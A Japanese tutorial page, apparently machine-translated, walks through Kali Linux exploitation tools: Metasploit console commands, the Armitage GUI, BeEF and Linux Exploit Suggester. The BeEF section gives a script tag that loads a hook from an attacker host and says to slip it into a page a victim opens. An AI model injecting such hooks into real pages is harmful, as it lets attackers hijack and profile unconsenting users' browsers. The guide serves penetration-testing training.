Kali-linux-exploitation-tools

提供:Dev Guides
移動先:案内検索

Kali Linux-悪用ツール

この章では、Kali Linuxが提供するさまざまな活用ツールについて学びます。

メタスプロイト

前述したように、MetasploitはRapid7の製品であり、ほとんどのリソースはWebページhttps://www.metasploit.com./[www.metasploit.com]にあります。 商用版と無料版の2つのバージョンがあります。 したがって、これら2つのバージョンの違いはそれほど大きくありません。この場合、コミュニティバージョン(無料)を使用します。

倫理的ハッカーとして、Metasploitコミュニティバージョンが埋め込まれた「Kali Ditribution」と、インストール時間を節約することで非常に快適な他の倫理的ハッキングツールを使用します。 ただし、別のツールとしてインストールする場合は、Linux、Windows、OS Xなどのオペレーティングシステムにインストールできるアプリケーションです。

最初に、KaliでMetasploit Consoleを開きます。 次に、アプリケーション→エクスプロイトツール→Metasploitに移動します。

エクスプロイトツール

起動すると、次の画面が表示され、Metasploitのバージョンに赤の下線が引かれます。

Metasploitバージョン

コンソールで、ヘルプまたは?を使用する場合 記号を使用すると、MSPのコマンドとその説明のリストが表示されます。 ニーズと使用するものに基づいて選択できます。

コンソールシンボル

別の重要な管理コマンドは msfupdate で、これは最新の脆弱性エクスプロイトでメタスプロイトを更新するのに役立ちます。 コンソールでこのコマンドを実行した後、更新が完了するまで数分待つ必要があります。

MSFUpdate

次のスクリーンショットに示すように、「検索」と呼ばれる優れたコマンドを使用して、必要なものを見つけることができます。 たとえば、Microsoftに関連するエクスプロイトを検索する場合、コマンドは msf> search name:Microsoft type:exploit になります。

ここで、「search」はコマンド、「name」は探しているオブジェクトの名前、「type」は探しているスクリプトの種類です。

検索コマンド

別のコマンドは「info」です。 使用されるモジュールまたはプラットフォーム、作成者、脆弱性リファレンス、およびこれが持つことができるペイロード制限に関する情報を提供します。

情報コマンド

アーミテージ

metasploitのArmitage GUIは、metasploitの補完ツールです。 ターゲットを視覚化し、エクスプロイトを推奨し、高度な悪用後の機能を公開します。

開いてみましょうが、最初にmetasploitコンソールを開いて起動する必要があります。 アーミテージを開くには、アプリケーション→エクスプロイトツール→アーミテージに移動します。

アーミテージ

次のスクリーンショットに示すように、[接続]ボタンをクリックします。

接続

開くと、次の画面が表示されます。

ユーザーフレンドリー

アーミテージはユーザーフレンドリーです。 「ターゲット」エリアには、発見したすべてのマシンと作業中のマシンが一覧表示されます。ハッキングされたターゲットは赤色で雷雨が発生しています。

ターゲットをハッキングした後、ターゲットを右クリックして、フォルダーの探索(参照)など、必要な操作を続けて探索できます。

探索中

次のGUIには、コンソールと呼ばれるフォルダーのビューが表示されます。 フォルダをクリックするだけで、metasploitコマンドを必要とせずにフォルダ間を移動できます。

GUIの右側には、脆弱性のモジュールがリストされているセクションがあります。

コンソールフォルダー

BeEF

BeEFは Browser Exploitation Framework の略です。 これは、Webブラウザーに焦点を当てた侵入テストツールです。 BeEFを使用すると、プロの侵入テスターは、クライアント側の攻撃ベクトルを使用して、ターゲット環境の実際のセキュリティ状態を評価できます。

まず、次のコマンドを使用してKaliパッケージを更新する必要があります-

root@kali:/# apt-get update
root@kali:/# apt-get install beef-xss

開始するには、次のコマンドを使用します-

root@kali:/# cd/usr/share/beef-xss
root@kali:/# ./beef

カーリーパッケージ

ブラウザを開き、ユーザー名とパスワードを入力します: beef

ブラウザを開く

BeEFフックは、クライアントブラウザで実行する必要があるBeEFサーバーでホストされるJavaScriptファイルです。 実行すると、ターゲットに関する多くの情報を通信するBeEFサーバーにコールバックします。 また、追加のコマンドとモジュールをターゲットに対して実行することもできます。 この例では、 BeEF フックの場所は http://192.168.1.101:3000/hook.js です。

ブラウザーを攻撃するには、クライアントが表示するページにJavaScriptフックを含めます。 それにはいくつかの方法がありますが、最も簡単な方法は、ページに次を挿入し、何らかの方法でクライアントにそれを開かせることです。

<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script>

ページが読み込まれたら、BeEFコントロールパネルに戻り、左上の[オンラインブラウザ]をクリックします。 数秒後、フックされたブラウザを表すIPアドレスポップアップが表示されます。 IPにカーソルを合わせると、ブラウザのバージョン、オペレーティングシステム、インストールされているプラ​​グインなどの情報がすぐに提供されます。

ページ読み込み

コマンドをリモートで実行するには、「所有」ホストをクリックします。 次に、コマンドで実行するモジュールをクリックし、最後に「実行」をクリックします。

リモートで実行

Linux Exploit Suggester

Linuxオペレーティングシステムのリリースバージョン 'uname -r' が与えられると、悪用の可能性が示唆されます。

それを実行するには、次のコマンドを入力します-

root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0
*3.0.0* は、利用したいLinux OSのカーネルバージョンです。

カーネルバージョン